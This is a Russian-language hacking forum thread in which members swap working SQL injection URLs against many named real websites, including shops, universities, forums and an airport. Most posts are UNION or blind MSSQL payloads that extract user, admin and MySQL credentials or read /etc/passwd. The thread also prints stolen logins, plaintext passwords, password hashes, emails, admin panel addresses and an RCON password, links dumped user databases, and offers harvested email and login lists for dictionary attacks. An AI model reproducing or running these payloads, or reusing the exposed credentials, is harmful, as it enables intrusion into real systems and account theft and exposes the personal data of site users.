хмм и админка на виду:)
Total Members: 3776

2Thanat0z
для перебора можно использывать специальные тулзы, если не дает результата то уже ручками, просто иногда бывает что в таблице 50-60 столбцов...

']2Thanat0z
для перебора можно использывать специальные тулзы, если не дает результата то уже ручками, просто иногда бывает что в таблице 50-60 столбцов...
или через order by

']2Thanat0z
для перебора можно использывать специальные тулзы, если не дает результата то уже ручками, просто иногда бывает что в таблице 50-60 столбцов...

я знаю, скриптик выкладывали в "полезные скрипты". Иногда просто нет предпосылок в виде "не то количество колонок", и такие я руками пробую, а иначе скриптом после 10 где-то. Если не катит через юнионселект, пробую через ордербай

http://www.eclectichomeschool.org/support/state.asp?stateid=(select+top+1+table_name+from+in formation_schema.tables)--

Инет-магазины (почти все):

Не нашел таблиц, лоадфайл вроде не работает:
__http://www.magic-pony.com/product.php?id=-1894+union+select+1,2,3,4,5,6,user,8,9,10,11,12,13 ,14/*&category=art
__http://www.shopmuseum.com/category.php?id=18&sub_id=-123'+union+select+1,2,3,4,user(),6,7/*

ошибки:

__http://amvets.fundlinkllc.com/showcategory.php?id=61'
__https://shop.invictusnetworks.com/detail.php?id=16026'
__http://www.usenetportal.com/detail.php?id=713'
__http://www.alicebxl.com/artsale.php?id=16'
__http://www.rocbattle.com/battle_details.php?id=37519'

странное чувство, что здесь есть скуль, сам не нашел:
__http://www.juniperresearch.com/shop/viewreport.php?id=-28'
__http://www.juniperresearch.com/shop/viewpressrelease.php?pr=-44'

Thanat0z,

http://www.shopmuseum.com/category.php?id=18&sub_id=-123'+union+select+1,2,3,concat(email,0x3a,password ),5,6,7+from+customers/*

wes@joedesigns.com:flash62

тут email=login :)

http://www.mikeosx.com/newsphp/show.php?id=-99+union+select+1,2,3,4,concat(name,0x3a,pass),6,7 ,8,9,10+from+users+limit+1,1/*

powermic:52609e00b7ee307e79eb100099b9a8bf
powermic:fingerprint

http://www.foxreality.com/show.php?id=-99+union+select+1,column_name,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33+from+INFORMATION_SCHEMA.COLUMNS+WH ERE+table_name=0x545f7573657273+limit+23,1/*

etc...
=\

_http://www.fotosale.com.ua/index.php?mod=prodList&cid=1&bid=-99+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,15,6,1 7/*

как всегда с названием таблци юзверей проблема((

http://www.nregion.com/txt.php?i=-8943+union+select+1,concat(user,0x3a,password),3,4 ,5,6,7,8,9+from+mysql.user/*

root:*2E4549A9308C1DFA3E3A1645E3CFD8E787134CBC

http://www.nregion.com/txt.php?i=-8943+union+select+1,concat(user,0x3a,password),3,4 ,5,6,7,8,9+from+mysql.user/*

root:*2E4549A9308C1DFA3E3A1645E3CFD8E787134CBC

http://www.nregion.com/txt.php?i=-8943+union+select+1,LOAD_FILE(0x2f6574632f70617373 7764),3,4,5,6,7,8,9/*

=\

http://www.nregion.com/txt.php?i=-8943+union+select+1,LOAD_FILE(0x2f6574632f70617373 7764),3,4,5,6,7,8,9/*

=\

А чего смайл перекошеный?) и нафига тебе /etc/passwd если хэш рута есть?))

http://www.rochester.edu/news/show.php?id=27654%20or%201=1/*
бесит уже 5 раз подряд не могу столбцы подобрать
2 none - root от бд, а ему может от сервака пароли нужны

2 none - root от бд, а ему может от сервака пароли нужны
мне они вообще не нужны...

http://candid.scurvy.net/profile/view.php?user_id=-4%20UNION%20SELECT%201,2,3,4,5,6,7,8,8,10,11,12,13 ,14,15,16/*
http://www.nekchandconference.org/public/view_text.php?user_id=-5%20union%20select%201,2,database(),user(),5,6,7,8/*
http://www.wvalaa.com/public/list.php?user_id=6%20union%20select%201,2,3,4,5,6, database(),8,user(),0,11/*

http://www.aboutpixel.de/index.php4?toppage=imagebank&subpage=member&user_id=-4%20union%20select%201,2,user_name,4,5,6,7,8,9,0,1 1,12,13,14,15,user_icq,17,18,19,20,21,user_passwor d,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,user_email,59,60,61,62,63,64%20from%204imag es_users/*
53k юзеров

http://www.linuxcd.org/view_distro.php?lst=&id_cate=12&id_distro=-99+union+select+1,2,concat(admin_name,0x3a,admin_p ass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29+from+admin/*

=\

еврейская община
http://www.jewish.ru/forum/index.php?page=1&idt=15647'%20union%20select%201,2,3,4,5,6,email,8, 9,passwd,11,12,13,14%20from%20%20user/*

Termin@L, ты собираешься пароли в /etc/passwd смотреть? :D :D :D

_http://www.monitoroflife.com/?a=details&lid=70+union+select+1*/
типа этого :
_http://www.hyipranks.com/?a=details&lid=2575+union+select+1*/
Два одинаковых движка , но реализовать хз как , т.к. используется много запросов.

http://www.monitoroflife.com/?a=details&lid=70+union+select+1*/

обнаружено: троянская программа Trojan-Downloader.JS.Agent.bx Скрипт: http://www.monitoroflife.com/?a=details&lid=70+union+select+1*/[6]

http://www.starkeith.net/member.php?user_id=-4%20union%20select%201,2,3,4,5,6,7,8/*

http://bartertown.com/ref/index.php?user_id=5 UNION SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://www.cgam.nerc.ac.uk/people/people_research.php?user_ID=-5%20UNION%20SELECT%200,1,2,3,4,password,6,7,8,9,10 ,11,12,13,14,15,16,17%20from%20mysql.user/*

Воть :)

Если не катит через юнионселект, пробую через ордербайИМХО сначала использовать order by так как сокращаешь время подбора но не везде работает.

http://bestposters.ru/main.php?big=-1262+union+select+1,concat(login,char(58),password ,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15+f rom+users+limit+1,1/*
около 20 юзеров, фу бяка даже не интересно :D

для меня день сегодня не очень удачный в количестве скулей, но очень поучительный в плане ошибок. Сейчас приведу скули, где есть ошибки, с которыми я ранее не сталкивался, и которые так или иначе являются тупиком, или по крайней мере я ничего получить не смог

__http://www.revolution.co.uk/_forum.php?neuron=3+order+by+14/*
__http://www.laptopshowcase.co.uk/downloads.php?id=1+group+by+11/*
__http://www.immunisation.org.uk/article.php?id=-97'+union+select+1,2,3,4,5,6,7,8/*

а кто разгадает это головоломку, тому дам +6
__http://www.prospect-magazine.co.uk/article_details.php?id=7320')+union+select+1111,22 22,3333,4444,555,666/*


и только один удачный

__http://www.publicwhip.org.uk/policy.php?id=-230+union+select+1,user,3,4,5,6,7/*

таблицу не смог подобрать, так пробывал...
__http://www.publicwhip.org.uk/policy.php?id=-230+union+select+1,user_name,3,4,5,6,7+from+pw_dyn .user/*

Thanat0z, читай больше
http://www.revolution.co.uk/_forum.php?topic=3766&message=446388+union+select+1,2,3,4,convert(versio n()+using+latin1),6,7,8,9&neuron=3&page=0
http://www.immunisation.org.uk/article.php?id=997'+union+select+1,2,user(),versio n(),5,6,7,8,9/*
http://www.prospect-magazine.co.uk/list.php?subject=48+union+select+1,2,3,version(),5 ,6,7,8,9,0,user(),2,3/*

Thanat0z, читай больше
http://www.revolution.co.uk/_forum.php?topic=3766&message=446388+union+select+1,2,3,4,convert(versio n()+using+latin1),6,7,8,9&neuron=3&page=0
http://www.immunisation.org.uk/article.php?id=997'+union+select+1,2,user(),versio n(),5,6,7,8,9/*
http://www.prospect-magazine.co.uk/list.php?subject=48+union+select+1,2,3,version(),5 ,6,7,8,9,0,user(),2,3/*

хе :) в этих кто может и можно вытянуть, а привел я совсем другие :) Но все равно ты крут :)

Thanat0z,c411k,
http://www.prospect-magazine.co.uk/list.php?subject=48+union+select+1,2,3,concat(emai l,0x3a,password),5,6,7,8,9,0,1,2,3+from+customers/*
email=login
:D

_http://www.bushtorrent.com/pic.php?id=-99+union+select+1,0x6869206d616e20212121,3,4,5,6+f rom+mysql.user/*

хех название таблиц не подобрал, зато название хоста))...тут приручена булка..а у булки название таблицы юзеров какая?

датинг сайт 300 юзеров
_http://www.datenlove.com/pic.php?id=-99+union+select+concat(name,0x3a,password,0x3a,ema il),2+from+users+limit+300,1/*

_http://www.112uh.com/image.php?id=-99+union+select+1,2,concat(username,0x3a,password, 0x3a,email),4+from+eftersnack_users/*
_http://www.112uh.com/image.php?id=-99+union+select+1,2,concat(user,0x3a,pass),4+from+ bf_users/*

но вход в админку только с определённого ип

_http://www.bushtorrent.com/pic.php?id=-99+union+select+1,0x6869206d616e20212121,3,4,5,6+f rom+mysql.user/*
хех название таблиц не подобрал, зато название хоста))...тут приручена булка..а у булки название таблицы юзеров какая?
злюка перебирай
http://www.bushtorrent.com/pic.php?id=-99+union+select+1,concat(username,char(58),passwd) ,3,4,5,6+from+users+limit+1,1/*


мои любимые часики http://www.orient-time.ru/trade/news.php?nid=-25+union+select+1,2,database(),user(),version()/* ;)

http://www.nix.ru/news/pnv.html?id=-99+union+select+table_name,2,3,4,5+from+INFORMATIO N_SCHEMA.TABLES+limit+16,1/*

=\

http://www.nintek.com.au/x/Scripts/nin_support_faq.asp?cate=-1+UNION+ALL+SELECT+1,table_name+from+information_s chema.tables--

__http://www.franinfo.co.uk/exhi_detail.php?id=-18'+union+select+1,user(),3,4,5,6,7,8,9/*&exhibitionId=54
__http://www.teachers.org.uk/topichome.php?id=-143'+union+select+1,convert(version()+using+latin1 ),333,444,555,6,7,8,9/*

http://www.rosmarket.ru/index.php?r_id=-1+union+select+user()/*

http://www.aldenvet.kiev.ua/news/viewnews.php?kley=-1+union+select+1,database(),version(),user(),5,6,7/*

ППЦ http://vrn.kips.ru/

http://ccrc.tc.columbia.edu/Publication.asp?UID=1+or+1=(SELECT+TOP+1+TABLE_NAM E+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+ NOT+IN+('ContentItem','ContentItem_Person','Archiv e','Archive_Pass','ArchiveColumn','ArchiveColumn_V alidationScheme',%20'Area','Category','Category_Cl ient','Category_Record','CCRCRole','Client_Categor y','Conference','ContentGroup','ContentItem_Conten tItemDesc','ContentItemDesc','ContentItemType','cw _Client','cw_Client_Card','cw_client_newsletter',' cw_client_newsletter_old','cw_Client_Pass','cw_Cli ent_RecordPass','cw_CreditTrans','cw_NewslettersSe nt','cw_Pass','cw_RecordRelate','cw_Session','Disc ussionPost','DiscussionTopic','DiscussionTopic_Rec ord','dtproperties','EditionList','Event','Fact',' Import','Link','Main','NB_Commander_Tmp',%20'Newsl etterFormat','OrgType','Person','PluginRecord','Pr esentation','Presentation_Conference','Presentatio n_ContentItem','Presentation_Person','Record_Pass' ,'RecordSecurity','ResearchProject',%20'ResearchPr oject_Person','Search','Seminar','Seminar_ContentI tem','Seminar_Person','sysconstraints','syssegment s','ValidationScheme'))--

http://www.pixiport.com/auction/profile.php?user_id=-6%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22/*

http://www.touchware.cz/view.php?uid=24&where=Software&id=-79%20union%20select%201,2,3,4,5,6,7,8,9,0/*

http://outcomes.web.arizona.edu/data.php?uid=-3%20UNION%20SELECT%200,1,2,3,4%20from%20informatio n_schema.tables/*

http://www.studieguide.sdu.dk/studier/index.php?uid=-92%20UNION%20SELECT%200,1,2,3,name,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20%20from%20groups%20wher e%20id=1/*

http://www.uovs.ac.za/content.php?cid=1&uid=-430%20UNION%20SELECT%200,1,2,concat(user,char(58), password),4,5,6,7%20from%20mysql.user/*

http://www.voyage-luxe.ru/chapter3.html?uid=3&uptr=&news_id=-2185%20UNION%20SELECT%200,concat(user,char(58),pas sword),2,3%20from%20mysql.user/*

http://ran.org/media_center/news_article/?uid=-2229%20UNION%20SELECT%200,1,user,3,4,5,6,7,8,9,pas sword,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,4 2%20from%20mysql.user/*

http://www.guiaoleo.com.ar/user_details.php?user_id=-5%20union%20select%201,2,3,4,5,6,7,8,9,0,11,12,13, 14,15,16,17,18,19,20,username,password,23,24,25,26 ,27,28,29,30,31,32%20from%20users/*

http://www.caduser.ru/acad/index.php?ver_id=-1+union+select+1,load_file('/etc/passwd'),3,4+from+mysql.user/*

_http://www.latek.com.ua/index.php?page=produkt.php&subcat=-51+UNION+SELECT+1,2,3,pas,5,log,7,8+from+user/*

http://www.vera-nn.ru/credit.php?id=-1+union+select+version()
5.0.21-max =\

Пройдемся по форумам

http://www.dog-handling.com/forum/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*

http://www.wsv-verden-jugend.de/forum/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*

http://www.a1k.it/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users%20where%20user_id<1000/*
Если там ограничение по юзерам не задовать, то ошибку выдает

http://www.frodo-beutlin.de/phpbb/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*

http://www.inbs-club.com/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*

http://www.lemondedescroisieres.com/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*

http://forum2002.maghrebonline.nl/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*

http://www.saloua.nl/vrouwen/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*

http://www.zauberschrank-forum.de/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*

http://members.lycos.co.uk/police100/downloads.php?cat=-1%20union%20select%201,user_id,concat(user_email,c har(58),user_icq,char(58),user_password),4,5,6,7,8 ,9%20from%20phpbb_users/*

В среднем, на каждом сайте 1500 юзеров. :)

Cologne Bonn Airport

_http://www.cgn.de/main.php?lang=2&id=45+union+select+1,2,3,LOAD_FILE(char(47,101,116 ,99,47,112,97,115,115,119,100)),5,6,database(),8,9 ,0,1,2,3,user(),5,6,7/*

__http://www.ihrc.org.uk/show.php?id=-1657+union+select+1,2,user(),database(),version(), 6,7,8,9,10,11,12,13/*

с этих не смог ничего вывести


__http://www.fairelections.us/article.php?id=-67+union+select+1,2,3,4,5/*
__http://www.elkhart.k12.in.us/content.php?id=157+union+select+1,2,3,4,555/*

__http://forum.skeye.com/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9,10% 20from%20phpbb_users/*


ЗЫ после вырежу мыльники и логины для словарей, кому надо, то пишите в личку

_http://kacca.webdevelopment.us/index.php?iid=ViewPlace&id=-1+union+select+1,concat(email,0x3a,passwd),3,4,5,6 ,7+from+users+limit+0,1/*
помогите найти таблицу админки

злюка таблица admins ;)

']http://www.bamba.ru/product.asp?view=1+or+1=(SELECT+TOP+1+cast(email+a s+nvarchar)%2B%27%3A%27%2Bcast(login+as+nvarchar)% 2B%27%3A%27%2Bcast(password+as+nvarchar)+from+MEMB ER+where+member_id=10)--
и че это?

в сорцы не глянул

http://www.a2k.org.ua/index.php?topic=9&section=-1+union+select+concat(user,password)+from+users/*&lng=ru

http://www.a2k.org.ua/admin/

admin:repz
------------------------------------------------------------

http://www.sevzapmebel.ru/index.php?area=hidden&level=-1+union+select+table_name+from+information_schema. tables+limit+14,1/*

-------------------------------------------------------------

http://www.btk.ru/index.php?category=-1+union+select+1111,222,3,'<script sql>alert(/_ANTICHAT_/)</script sql>',44,1+from+articles/*

http://www.bulgaria.by/rus/index.php?text_id=-99+union+select+concat(login,0x3a,pwd)+from+user+l imit+0,1/*

=\

__http://www.skype-forum.com/downloads.php?cat=-1%20union%20select%201,concat(user_email,char(58), user_icq,char(58),user_password),3,4,5,6,7,8,9%20f rom%20bb_users%20where%20user_id<1000/*

БД: __http://rapidshare.com/files/17283919/db_skype-forum.com.rar

формат: email icq md5-hash (xls) 273kb in rar
pass:a-chat
количество записей :7217


кстати кто не видел, в прошлый раз я выкладывал
__http://rapidshare.com/files/15758988/base_forum_siemens-club_ru.rar

http://tagswap.net/index.lasso?pgID=2&uID=-10%20union%20select%201,2,3,4,5,6,7,8,9/*

http://www.running-wild.net/forum/downloads.php?cat=-1%20union%20select%201,concat(user_email,char(58), user_icq,char(58),user_password),3,4,5,6,7,8,9%20f rom%20phpbb_users/*
:)

http://sadovnica.ru/cvet/index.php?aid=-1+union+select+6,2,database(),version(),USER()/*
хе моя первая в этой теме. :)

sadovnica.ru
гыы, жжошь))

вот я чё откопал
http://shkola.lv/?mode=lsntheme&themeid=-99+union+select+1,2,user(),4,5/*

__http://www.craftersforcritters.com/vendor.php?id=119+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,convert(user()+using+latin1),15/*

что с этим можно сделать хз
__http://www.ogilvy.com/viewpoint/view_ko.php?id=42734'&iMagaId=9

__http://www.theracersgroup.com/shop/car.php?id=-19+union+select+1,2,3,4,5,6,7,8,user(),database(), version(),12,3,14,5,6,7,8,9,20,1,22,3,4,5,26,7,8,9 ,0,1,2,33,34,5,6/*

:)
http://www.rosto.ru/exec.php?sport=48'%20UNION%20SELECT%201,concat(use rname,0x3a,password),3,4,5,6,7,8,9,10,11,12,13%20F rom%20users/*

_http://kramer.ru/admin/includes/head.inc

http://webz.priop.ru/index.php?categ=-628+union+select+1,2,3,4,5,6,7,8,9,10/* таблицы не охота перебирать))

Любютелям КС :)

http://cs.cyfra.ua/advstat.php?mode=admin
Login:admin
Pass:street

RCON_PASSWORD, на все сервера Цуфры:

Pass: rconpassword6

А вобще вот :

Цуфра:

http://cs.cyfra.ua/advstat.php?mode=playerinfo&player=47595&killLimit=1+union+select+concat_ws(CHAR(58),user() ,database(),version()),2,3,4,5/*

Ласки:

http://cs.lucky.net/hlstats/hlstats.php?mode=playerinfo&player=47595&killLimit=1+order+by+5/*

Версия бд 3 (.

Если надо, могу поискать Дампы vbios.com.

Что ещё можно сделать на етом сайте ? Что мог попробовал, ничё не откопал кроме user() database()... ;)
http://igrafit.ru/company/news/?article=-1+union+select+1,2,3,4,5,7,8,9,10,11,12,13/*

интернет магазин.
база просто super_super :D :D :D
http://www.super.com.ua/local/plug-in/a-price/showone.php?groupid=51&id=-18895+union+select+1,2,3,version(),5,6,7,8,9,10,11 ,12,13,14,15,16,database(),18,19,20,21,22,23,24,25/*

http://www.ofb.biz/article.pl?sid=-75+UNION+SELECT+1,2,3,concat(username,0x3a,passwor d,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17+fr om+users/*

Username:cellularguy
Password:a.CLuP.omGhUo
Mail:web-master@si.rr.com



http://www.orientation-lyon.org/choix/bts2007/detail.php?idd=658+UNION+SELECT+1,2,3,concat(usern ame,0x3a,password),5,6,7,8,9,10,11,12,13+from+orie ntationlyon_users/*

Username:System Administrator
Password:96da4c180c95beb563b797df331f4e8f

не густо :(

_http://www.whenhamstersattack.com/news.php?id=-99+union+select+1,2,3,4,5,6,7/*

хех перебирать страшно..там такоооеее ;)

www.Tetis-Pro.ru
http://www.tetis-pro.ru/?menu_id=&page_id=-1+union+select+1,2,login,pass,5,6,7,8,9+from+users +limit+0,1/*
admin:xxx
http://www.tetis-pro.ru/admin


http://www.iriscom.ru/index.php?page_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

сорь не знал....

это я к тому, что админам пох))

GlobalMoney.ru
http://www.globalmoney.ru/affiliate/order.php?tovar_id=-1+union+select+1,2,login,4,5,password,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34+from+users+limit+0,1

http://www.mirmaek.ru/index.php?rubric_id=28&page=-1
К сожелению думаю из этого не чего не получится, но всё же, как я понял параметр ПЕЙДЖ берётся для вычисления лимита вывода /простым сумированием/, а параметр рубрики не смог провести.
Кто сделает если не сложно выложите, я хочу глянуть как это можно провернуть.... :)

http://www.ezgulik.org/news.php?id=-197%20union%20select%201,2,user(),database(),5,6/*

http://www.trud.ru/issue/news.php?id=-2222%20union%20select%201,2,user(),database(),5,6, 7/*

http://www.survival-international.org/news.php?id=-2128%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17/*

http://www.a2k.org.ua/news.php?id=-31%20union%20select%201,2,3,email,password,id,user ,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20 users/*&lng=en

Login - admin
Password - zepz
Админка - http://a2k.boxnews.com.ua/admin/

Login - admin
Password - zepz
Админка - http://a2k.boxnews.com.ua/admin/

http://forum.antichat.ru/threadnav21336-58-10.html
Написал *D1VER 19.02.2007, 21:57 /одна большая дырка/

http://www.a2k.org.ua/index.php?topic=9&section=-1+union+select+concat(user,password)+from+users/*&lng=ru

http://www.a2k.org.ua/admin/

admin:repz

Упс :)

http://english.dvb.no/news.php?id=-4399%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22/*

http://www.mounteverest.net/news.php?id=-15244%20union%20select%201,2,3,4,5,6,7/*

http://www.allaboutjazz.com/php/news.php?id=8639999991%20union%20select%201,2,3,4, 5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27/*

В последнем есть форум. Таблицы не подобрал

http://lizvicious.com/tour1/index.php?section=113&start=1"&t=movies
Напишите, пожалуйста, в личку, если кто разберёться. А то не получаеться ничего.

http://lizvicious.com/tour1/index.php?section=113&t=movies&start=2+union+select+1/*

DB Error: Wrong usage of UNION and ORDER BY

Что ещё можно сделать на етом сайте ? Что мог попробовал, ничё не откопал кроме user() database()... ;)

http://igrafit.ru/company/news/?article=-1+union+select+1,2,3,4,5,7,8,9,10,11,12,13/*

RaDDeaD
щас модно по 2 раза постить одно и тоже?
посвящаеться фанатам гостей из будущего
http://gosti.ru/gforum/f_othinfo.php?thuid=-594+union+select+1,2,3,4,5,6,concat(login,CHAR(59) ,pass,CHAR(59),email),8,9,10,11+from+gusers/*пассы в чистом виде ;)

http://www.ont.by/index.php?id_issue=3&id=-14616+union+select+1,2,3,VERSION(),5,6,7,8,9,10,11/*

http://www.ksu.ru/podrobnee.php?id=-1797+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://free.thelinuxstore.ca/news.php?id=-19%20union%20select%201,2,3,4/*

http://www.multidmedia.com/news/news.php?id=-62%20UNION%20SELECT%200,1,2,3,4/*
:)

http://www.csr.spbu.ru/showart.php3?id=-1109+UNION+SELECT+1,concat(user,password),3,4+from +mysql.user/*

http://www.nlr.ru/news/vid_news.php?id=-604+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35/*


http://ultrabyte.ru/viewvac.php?id=-1172007918+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41/*

__http://www.magicwings.com/index.php?id=-9+union+select+concat(user(),0x3a,0x3a,database(), 0x3a,0x3a,version())/*

http://www.c-gallery.org.ru/daily_in.php?view_id=-1+union+select+1,2,3,version(),5/*
http://www.impactsoft.ru/prods.php?razdel_id=-1+union+select+1,2,3,4,5,6,7,8,9/*
http://acana.ru/partners.php?razdel_id=-1+union+select+1,user(),version(),4,5,6/*
http://www.rossignol.ru/ski/shops/moscow/?shop_id=-1+union+select+user(),version(),database(),current _date(),5,6,7,8,9,10,11,12,13/*

http://www.allaboutjazz.com/php/news.php?id=-7084%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

http://www.regenwald.org/news.php?id=-568%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,1 2,13/*

http://www.footballfoundation.com/news.php?id=-948%20union%20select%201,2,3,4,5,6,7%20from%20mysq l.user/*

http://www.collegefootball.org/news.php?id=-559%20UNION%20SELECT%200,1,2,3,4,5,6%20from%20mysq l.user/*

http://www.insanely-great.com/news.php?id=-7026%20union%20select%201,2,3,table_name,5,6,7,8,9 ,0,11,12,13,14,15,16,17,18%20from%20information_sc hema.tables/*

http://www.sodalitas.it/news.php?ID=-121%20UNION%20SELECT%200,1,user,password,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,4 2,43,44,45%20from%20user/*

Воть :)

http://www.nextaz.com/showsoft.php?id=-5711+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12/*

http://www.eval-net.org/index.php?id=-20+union+select+1,2,3,4,5,6,7/*


http://ultrabyte.ru/viewvac.php?id=-1172007918+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41/*

http://www.ingeniatechnology.com/russian/news_dtl.php?id=-166+union+select+1,2,3,4,5,6,7,8,9/*

http://bridge-belarus.org/php/person_tours.php?id=-66+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22/*


http://www.ecotour.by/viewtour.php?id=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat( username,0x3a,password,0x3a,email),14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31+from+user/*

http://www.molot.by/article_det.php?id=-61+union+select+1,2,3,4,5,6+from+user/*

http://www.kinder.by/gallery/show.php?id=-1171560816+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15+from+admin/*

http://cfis.by/text.php?id=-5+union+select+1,2,3,4/*

http://director-online.com/buildArticle.php?id=-1160+union+select+1,2,3,4,5,6,7,8+from+user/*

http://blogsforlearning.msu.edu/articles/view.php?id=-6+union+select+1,2,3,4,5,6,7,8,9/*

http://www.gatech.edu/calendar/event.php?id=-1665+union+select+1,2,3,4,5,VERSION(),7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30/*

http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-213+union+select+1,2/*

http://www.keckobservatory.org/article.php?id=-98+union+select+1,2,3,4,5,6,7,8+from+mysql.user/*

вот чуть скулей))

http://www.pornolib.ru/list.php?g=&link=166+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13 ,14,15,16,17,18/*

http://director-online.com/buildArticle.php?id=-1160+union+select+1,2,3,4,5,6,7,8+from+user/*

http://director-online.com/buildArticle.php?id=-1160+union+select+1,2,3,4,5,6,7,8+from+user/*
http://director-online.com/buildArticle.php?id=-1160+union+select+1,2,3,4,5,6,7,8+from+user/*
Ну и я тогда этот скуль напишу :)
http://director-online.com/buildArticle.php?id=-1160+union+select+1,2,3,4,5,concat(email,char(58), password),7,8+from+phorum_users/*

И еще парочку.
http://www.regenwald.org/news.php?id=-569%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,1 2,13/*
http://www.agh.edu.pl/news.php?id=-389%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15/*
http://www.primocanale.it/news.php?id=-12288%20UNION%20SELECT%200,user,2,3,4,password,6,7 ,8%20from%20mysql.user/*
http://www.aquionics.com/news.php?id=700000000000000%20UNION%20SELECT%200,1 ,2,concat(username,char(58),password,char(58)),4,5 %20from%20users/*

__http://www.vyshop.com/product_detail.php?id=-5+union+select+1,concat(user(),char(58),database() ,char(58),version()),333,444,555,6,7,8,9,10,11/*


__http://www.gamesfirst.com/index.php?id=1132'

http://www.gamesfirst.com/index.php?id=-1132+UNION+SELECT+1,count(*),3+from+users/*
http://www.gamesfirst.com/index.php?id=-1132+UNION+SELECT+null,concat(userid,char(58),user name,char(58),password),null+from+users/*

Когда же по нормальному все научитесь делать чуть какое то отклонение от правил сразу... такие глаза oO )))

http://www.golodomor.org.ua/news.php?id=-1640%20UNION%20SELECT%200,1,2,3,concat(id,char(58) ,name,char(58),email,char(58),pass),5%20from%20use rs%20limit%204,1/*
http://www.patriciapiccinini.net/news.php?id=-46%20union%20select%201,2,concat(id,char(58),login ,char(58),email,char(58),password),4,5%20from%20de alers/*
:)

golodomor.org.ua
уже было, не латают они дыры, а потом жалуются что злобные хакеры коцают их

_http://www.rsi.ru/news/news.asp?id=2334+or+1=(SELECT+TOP+1+cast(LOGINS+as +nvarchar)%2B%27%3A%27%2Bcast(PASSWORD+as+nvarchar )%2B%27%3A%27%2Bcast(MAIL+as+nvarchar)+from+RSI_LO GINS+where+Id=1)--
вот и mssql забацал ;)

_http://www.eng.wayne.edu/news.php?id=-99+union+select+1,id,3,4,5,6,7,8,9,0,1,2,3+from+us ers/*
а вот с названием отстальных колонок проблемы

http://www.duet-service.ru/conf/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.ww-realty.ru/main.php?pg=faq&faqaction=showsubheading&id=-1+union+select+1,2,database(),4,5,6/*

